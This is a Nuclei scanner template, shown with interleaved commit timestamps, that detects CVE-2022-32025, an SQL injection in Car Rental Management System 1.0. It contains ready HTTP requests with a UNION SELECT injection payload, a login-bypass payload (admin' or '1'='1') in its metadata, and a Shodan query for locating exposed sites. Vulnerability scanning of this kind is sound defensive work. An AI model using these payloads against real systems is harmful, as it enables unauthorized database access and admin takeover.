nuclei-templates/cves/2022/CVE-2022-32025.yaml

55 lines
1.6 KiB
YAML
Raw Normal View History

2022-07-31 21:07:46 +00:00
id: CVE-2022-32025
info:
name: Car Rental Management System 1.0 - SQL Injection
2022-07-31 21:07:46 +00:00
author: arafatansari
severity: critical
2022-07-31 21:07:46 +00:00
description: |
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-31 21:07:46 +00:00
reference:
2022-08-01 12:46:26 +00:00
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32025
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-32025
cwe-id: CWE-89
2022-07-31 21:07:46 +00:00
metadata:
2022-08-02 09:19:52 +00:00
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
shodan-query: http.html:"Car Rental Management System"
verified: "true"
2022-08-01 12:46:26 +00:00
tags: cve,cve2022,carrental,cms,sqli,authenticated
variables:
num: "999999999"
2022-07-31 21:07:46 +00:00
requests:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-01 12:46:26 +00:00
username={{username}}%23&password={{password}}
2022-07-31 21:07:46 +00:00
- |
2022-08-01 12:46:26 +00:00
GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
2022-07-31 21:07:46 +00:00
Host: {{Hostname}}
2022-08-02 09:19:52 +00:00
skip-variables-check: true
2022-07-31 21:07:46 +00:00
redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-01 12:46:26 +00:00
- '{{md5({{num}})}}'
2022-07-31 21:07:46 +00:00
- type: status
status:
- 200
# Enhanced by md on 2022/09/26